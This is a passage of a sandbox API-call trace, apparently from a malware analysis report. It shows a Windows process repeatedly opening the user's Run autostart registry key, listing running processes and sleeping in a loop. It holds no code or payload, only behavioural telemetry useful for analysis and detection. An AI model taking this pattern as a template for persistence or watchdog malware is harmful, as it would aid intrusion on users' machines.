Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.093] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.093] NtClose (Handle=0x274) returned 0x0 [0176.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.102] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.107] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.108] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.108] NtClose (Handle=0x274) returned 0x0 [0176.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.170] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.171] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.171] NtClose (Handle=0x274) returned 0x0 [0176.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.181] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.186] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.188] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.188] NtClose (Handle=0x274) returned 0x0 [0176.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.206] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.207] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.207] NtClose (Handle=0x274) returned 0x0 [0176.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.220] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.224] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.225] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.225] NtClose (Handle=0x274) returned 0x0 [0176.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.240] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.241] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.241] NtClose (Handle=0x274) returned 0x0 [0176.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.254] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.255] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.255] NtClose (Handle=0x274) returned 0x0 [0176.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.271] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.272] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.272] NtClose (Handle=0x274) returned 0x0 [0176.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.283] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.286] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.301] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.302] NtClose (Handle=0x274) returned 0x0 [0176.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.314] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.322] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.323] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.323] NtClose (Handle=0x274) returned 0x0 [0176.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.334] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.343] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.344] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.344] NtClose (Handle=0x274) returned 0x0 [0176.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.354] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.357] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.358] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.358] NtClose (Handle=0x274) returned 0x0 [0176.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.371] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.372] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.372] NtClose (Handle=0x274) returned 0x0 [0176.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.374] NtFreeVirtualMemory 